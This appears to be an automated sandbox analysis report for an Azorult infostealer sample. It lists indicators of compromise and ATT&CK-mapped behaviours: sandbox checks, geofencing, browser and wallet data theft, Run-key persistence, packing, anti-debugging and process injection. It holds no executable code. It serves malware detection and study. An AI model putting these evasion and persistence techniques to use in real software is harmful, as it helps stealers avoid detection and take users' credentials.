azorult | 37aa2beb667b66b5b548722f4a5b7c72d01b191c538e4ad1acb9467cbc5d8727

System Information Discovery

Processes:

R6FvEeAMzuG1FGXNrudfSjbH.exesvchost.exekujVG5GGe2ek8fuaYQkw4LR5.exe2512705.exe5126552.exeoDgBhLX9H2wUXa4t35viNJ5_.exe6502571.exe0Vr9D_F8XxNNWHBspJrnqkRj.exeNF3qvWLxsEGUarpyvx7yOwx_.exeWFs2R34gCIfKUZ61dr3jvV2X.exe8c7AOkmXVdatkeJ_O43dbF51.exe5777262.exeViKM1A7qIBM0V_EEsw4fP8uO.exesvchost.exe1017834.exey_QaUUThIYKqSe5cUViDSYMb.exe2144316.exeoDwQ7LEcAjRt4GRKECYkOXaw.exe1342723.exeWsKBEzuxaPjQpYj11ghzQynd.exe6D5w5Q7mL7XYrOJbJ4O_r8jG.exe4uXq3GhA2yYG7l00zi_5YFml.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	R6FvEeAMzuG1FGXNrudfSjbH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	R6FvEeAMzuG1FGXNrudfSjbH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kujVG5GGe2ek8fuaYQkw4LR5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2512705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5126552.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	oDgBhLX9H2wUXa4t35viNJ5_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6502571.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0Vr9D_F8XxNNWHBspJrnqkRj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NF3qvWLxsEGUarpyvx7yOwx_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WFs2R34gCIfKUZ61dr3jvV2X.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8c7AOkmXVdatkeJ_O43dbF51.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5777262.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0Vr9D_F8XxNNWHBspJrnqkRj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViKM1A7qIBM0V_EEsw4fP8uO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1017834.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	y_QaUUThIYKqSe5cUViDSYMb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2144316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2512705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	oDwQ7LEcAjRt4GRKECYkOXaw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViKM1A7qIBM0V_EEsw4fP8uO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1342723.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kujVG5GGe2ek8fuaYQkw4LR5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WsKBEzuxaPjQpYj11ghzQynd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6502571.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	oDwQ7LEcAjRt4GRKECYkOXaw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6D5w5Q7mL7XYrOJbJ4O_r8jG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1342723.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4uXq3GhA2yYG7l00zi_5YFml.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6D5w5Q7mL7XYrOJbJ4O_r8jG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2144316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8c7AOkmXVdatkeJ_O43dbF51.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	oDgBhLX9H2wUXa4t35viNJ5_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	y_QaUUThIYKqSe5cUViDSYMb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5777262.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1017834.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4uXq3GhA2yYG7l00zi_5YFml.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WsKBEzuxaPjQpYj11ghzQynd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5126552.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NF3qvWLxsEGUarpyvx7yOwx_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WFs2R34gCIfKUZ61dr3jvV2X.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Calculator.exeCalculator.exeCrowdInspect64.exeSetup.exeTue13d68628efddb1.exeTue132dd525eb51d2.exeFzzwDzPlAL9UZEBUFYd2MLsB.exek3XkRJE7kYvg6f6IKTC_1kVB.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Calculator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Calculator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	CrowdInspect64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Tue13d68628efddb1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Tue132dd525eb51d2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	FzzwDzPlAL9UZEBUFYd2MLsB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	k3XkRJE7kYvg6f6IKTC_1kVB.exe

Loads dropped DLL 64 IoCs

Processes:

setup_install.exeTue136037e6ffe49ce8.tmpb94cV6KOavGXOWpZ1FiI6sCb.exeTue136037e6ffe49ce8.tmprundll32.exeschtasks.exesetup.tmpbrRLNivI0mn8MoMgDt3QbiRV.exeConhost.exesetup.exesetup.exemsiexec.exerundll32.exemsiexec.exeCalculator.exeCalculator.exepowershell.exeCalculator.exeConhost.exepowershell.exeCalculator.exeCalculator.exe

pid	process
3060	setup_install.exe
3060	setup_install.exe
3060	setup_install.exe
3060	setup_install.exe
3060	setup_install.exe
3060	setup_install.exe
4860	Tue136037e6ffe49ce8.tmp
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5408	Tue136037e6ffe49ce8.tmp
6708	rundll32.exe
7208	schtasks.exe
8028	setup.tmp
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5796	Conhost.exe
5796	Conhost.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
3640	setup.exe
3640	setup.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
8180	brRLNivI0mn8MoMgDt3QbiRV.exe
4856	setup.exe
4856	setup.exe
7860	msiexec.exe
7860	msiexec.exe
4396	rundll32.exe
3640	setup.exe
3640	setup.exe
10236	msiexec.exe
3640	setup.exe
10236	msiexec.exe
8548	Calculator.exe
8548	Calculator.exe
8548	Calculator.exe
7832	Calculator.exe
7540	powershell.exe
9924	Calculator.exe
7540	powershell.exe
9924	Calculator.exe
9916	Conhost.exe
9916	Conhost.exe
9916	Conhost.exe
7540	powershell.exe
9924	Calculator.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4848	Calculator.exe
4848	Calculator.exe
4848	Calculator.exe
4484	powershell.exe
4848	Calculator.exe
9924	Calculator.exe
4304	Calculator.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

11248 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
11248	icacls.exe

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\4uXq3GhA2yYG7l00zi_5YFml.exe	themida
C:\Users\Admin\Pictures\Adobe Films\4uXq3GhA2yYG7l00zi_5YFml.exe	themida
C:\Users\Admin\Pictures\Adobe Films\y_QaUUThIYKqSe5cUViDSYMb.exe	themida
C:\Users\Admin\Pictures\Adobe Films\oDgBhLX9H2wUXa4t35viNJ5_.exe	themida
C:\Users\Admin\Pictures\Adobe Films\WsKBEzuxaPjQpYj11ghzQynd.exe	themida
C:\Users\Admin\Pictures\Adobe Films\R6FvEeAMzuG1FGXNrudfSjbH.exe	themida
C:\Users\Admin\Pictures\Adobe Films\y_QaUUThIYKqSe5cUViDSYMb.exe	themida
C:\Users\Admin\Pictures\Adobe Films\oDgBhLX9H2wUXa4t35viNJ5_.exe	themida
behavioral1/memory/2748-276-0x0000000000980000-0x0000000000981000-memory.dmp	themida
behavioral1/memory/2900-283-0x00000000003D0000-0x00000000003D1000-memory.dmp	themida
behavioral1/memory/3952-288-0x0000000000010000-0x0000000000011000-memory.dmp	themida
behavioral1/memory/2656-301-0x00000000001C0000-0x00000000001C1000-memory.dmp	themida
behavioral1/memory/3720-328-0x00000000010E0000-0x00000000010E1000-memory.dmp	themida
C:\Users\Admin\Pictures\Adobe Films\WsKBEzuxaPjQpYj11ghzQynd.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8571435.exesetup.exesetup.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	8571435.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5"	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5"	setup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 22 IoCs

evasion trojan

System Information Discovery

Processes:

oDgBhLX9H2wUXa4t35viNJ5_.exeWsKBEzuxaPjQpYj11ghzQynd.exe8c7AOkmXVdatkeJ_O43dbF51.exe0Vr9D_F8XxNNWHBspJrnqkRj.exe1342723.exeWFs2R34gCIfKUZ61dr3jvV2X.exekujVG5GGe2ek8fuaYQkw4LR5.exeViKM1A7qIBM0V_EEsw4fP8uO.exe6D5w5Q7mL7XYrOJbJ4O_r8jG.exe1017834.exeNF3qvWLxsEGUarpyvx7yOwx_.exe6502571.exeR6FvEeAMzuG1FGXNrudfSjbH.exey_QaUUThIYKqSe5cUViDSYMb.exeoDwQ7LEcAjRt4GRKECYkOXaw.exesvchost.exe2144316.exe5126552.exe4uXq3GhA2yYG7l00zi_5YFml.exe5777262.exe2512705.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	oDgBhLX9H2wUXa4t35viNJ5_.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WsKBEzuxaPjQpYj11ghzQynd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8c7AOkmXVdatkeJ_O43dbF51.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0Vr9D_F8XxNNWHBspJrnqkRj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1342723.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WFs2R34gCIfKUZ61dr3jvV2X.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	kujVG5GGe2ek8fuaYQkw4LR5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ViKM1A7qIBM0V_EEsw4fP8uO.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6D5w5Q7mL7XYrOJbJ4O_r8jG.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1017834.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NF3qvWLxsEGUarpyvx7yOwx_.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6502571.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	R6FvEeAMzuG1FGXNrudfSjbH.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	y_QaUUThIYKqSe5cUViDSYMb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	oDwQ7LEcAjRt4GRKECYkOXaw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2144316.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5126552.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4uXq3GhA2yYG7l00zi_5YFml.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5777262.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2512705.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
350	ipinfo.io
901	ipinfo.io
1145	ip-api.com
2265	api.2ip.ua
2369	api.2ip.ua
101	ipinfo.io
764	ipinfo.io
907	ipinfo.io
2266	api.2ip.ua
291	ipinfo.io
437	ipinfo.io
765	ipinfo.io
902	ipinfo.io
1948	ip-api.com
4095	api.2ip.ua
99	ipinfo.io
294	ipinfo.io
331	ip-api.com
436	ipinfo.io
808	ipinfo.io
4096	api.2ip.ua

Drops file in System32 directory 13 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\PowerControl LG	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 622F3A044580C727	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\PowerControl HR	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

Processes:

4uXq3GhA2yYG7l00zi_5YFml.exeoDgBhLX9H2wUXa4t35viNJ5_.exeR6FvEeAMzuG1FGXNrudfSjbH.exeWsKBEzuxaPjQpYj11ghzQynd.exey_QaUUThIYKqSe5cUViDSYMb.exe6502571.exe0Vr9D_F8XxNNWHBspJrnqkRj.exe5777262.exeoDwQ7LEcAjRt4GRKECYkOXaw.exeViKM1A7qIBM0V_EEsw4fP8uO.exe6D5w5Q7mL7XYrOJbJ4O_r8jG.exe1017834.exe2512705.exe2144316.exe5126552.exe1342723.exeNF3qvWLxsEGUarpyvx7yOwx_.exe

pid	process
2748	4uXq3GhA2yYG7l00zi_5YFml.exe
2900	oDgBhLX9H2wUXa4t35viNJ5_.exe
3952	R6FvEeAMzuG1FGXNrudfSjbH.exe
2656	WsKBEzuxaPjQpYj11ghzQynd.exe
3720	y_QaUUThIYKqSe5cUViDSYMb.exe
3580	6502571.exe
7264	0Vr9D_F8XxNNWHBspJrnqkRj.exe
6596	5777262.exe
4192	oDwQ7LEcAjRt4GRKECYkOXaw.exe
7800	ViKM1A7qIBM0V_EEsw4fP8uO.exe
5568	6D5w5Q7mL7XYrOJbJ4O_r8jG.exe
6352	1017834.exe
3632	2512705.exe
184	2144316.exe
10064	5126552.exe
1448	1342723.exe
4668	NF3qvWLxsEGUarpyvx7yOwx_.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

Tue13530584f2459af.exeTue13a3eaad6ca1da2.exeMfR5P3jtbVt2lnIZPTc_I1w1.exefzUe5uYYwWRli9uqh43zt8g5.exeUSAUkIeyEMXxC37_VirxwDso.exesvchost.exeQ5WuGmJ59r2QogFU0JkU_U8B.exeffskZYr_cWNnRFcTcHnN5XZN.exefFavAFyAiEPvlZ6R3Adu8GmC.exe

description	pid	process	target process
PID 5016 set thread context of 4060	5016	Tue13530584f2459af.exe	Tue13530584f2459af.exe
PID 4308 set thread context of 880	4308	Tue13a3eaad6ca1da2.exe	Tue13a3eaad6ca1da2.exe
PID 3576 set thread context of 5268	3576	MfR5P3jtbVt2lnIZPTc_I1w1.exe	MfR5P3jtbVt2lnIZPTc_I1w1.exe
PID 1724 set thread context of 6252	1724	fzUe5uYYwWRli9uqh43zt8g5.exe	fzUe5uYYwWRli9uqh43zt8g5.exe
PID 4044 set thread context of 4776	4044	USAUkIeyEMXxC37_VirxwDso.exe	USAUkIeyEMXxC37_VirxwDso.exe
PID 2604 set thread context of 6768	2604	svchost.exe	svchost.exe
PID 6612 set thread context of 4388	6612	Q5WuGmJ59r2QogFU0JkU_U8B.exe	Q5WuGmJ59r2QogFU0JkU_U8B.exe
PID 5364 set thread context of 5292	5364	ffskZYr_cWNnRFcTcHnN5XZN.exe	ffskZYr_cWNnRFcTcHnN5XZN.exe
PID 6640 set thread context of 5228	6640	fFavAFyAiEPvlZ6R3Adu8GmC.exe	fFavAFyAiEPvlZ6R3Adu8GmC.exe

Drops file in Program Files directory 17 IoCs

Processes:

BVmvoWdUrHGF9M0d_Eo5ELvM.exeUUVaP6vwQ16WWIFuMy_gPOOv.exeqMaxZyfrRyDDEoYOBts12TGA.exeTue136037e6ffe49ce8.tmpsetup.tmpN6nJ3oy_c9uGXimEU1sNmAbl.exeH8mDPgJlNyEyJnfjqbA4GKMH.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	UUVaP6vwQ16WWIFuMy_gPOOv.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	qMaxZyfrRyDDEoYOBts12TGA.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst3.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Tue136037e6ffe49ce8.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-6PDLR.tmp	Tue136037e6ffe49ce8.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-9QJ0I.tmp	setup.tmp
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	UUVaP6vwQ16WWIFuMy_gPOOv.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	N6nJ3oy_c9uGXimEU1sNmAbl.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Tue136037e6ffe49ce8.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	H8mDPgJlNyEyJnfjqbA4GKMH.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	N6nJ3oy_c9uGXimEU1sNmAbl.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	qMaxZyfrRyDDEoYOBts12TGA.exe

Drops file in Windows directory 13 IoCs

Processes:

8c7AOkmXVdatkeJ_O43dbF51.exekujVG5GGe2ek8fuaYQkw4LR5.exesvchost.exeMicrosoftEdge.exeWFs2R34gCIfKUZ61dr3jvV2X.exeWerFault.exesvchost.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\System\xxx1.bak	8c7AOkmXVdatkeJ_O43dbF51.exe
File created	C:\Windows\System\xxx1.bak	kujVG5GGe2ek8fuaYQkw4LR5.exe
File opened for modification	C:\Windows\System\svchost.exe	kujVG5GGe2ek8fuaYQkw4LR5.exe
File created	C:\Windows\System\xxx1.bak	svchost.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\System\xxx1.bak	WFs2R34gCIfKUZ61dr3jvV2X.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\System\svchost.exe	WFs2R34gCIfKUZ61dr3jvV2X.exe
File opened for modification	C:\Windows\System\svchost.exe	WFs2R34gCIfKUZ61dr3jvV2X.exe
File created	C:\Windows\System\xxx1.bak	svchost.exe
File created	C:\Windows\System\svchost.exe	8c7AOkmXVdatkeJ_O43dbF51.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5752	2412	WerFault.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
5724	708	WerFault.exe	Tue130c270d23c79.exe
5200	2412	WerFault.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
6504	2412	WerFault.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
6920	2412	WerFault.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
7128	4752	WerFault.exe	Tue13a47d89c50.exe
3964	3208	WerFault.exe	rOa7Med5tUaEVSeLw_3RQa3S.exe
7752	2328	WerFault.exe	QyPwot4QIN3DyCJqH3uWauR6.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

MfR5P3jtbVt2lnIZPTc_I1w1.exeffskZYr_cWNnRFcTcHnN5XZN.exeM5OEbtR68Nhc4IN3TRyoAffj.execmd.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MfR5P3jtbVt2lnIZPTc_I1w1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ffskZYr_cWNnRFcTcHnN5XZN.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	M5OEbtR68Nhc4IN3TRyoAffj.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ffskZYr_cWNnRFcTcHnN5XZN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	M5OEbtR68Nhc4IN3TRyoAffj.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	M5OEbtR68Nhc4IN3TRyoAffj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe
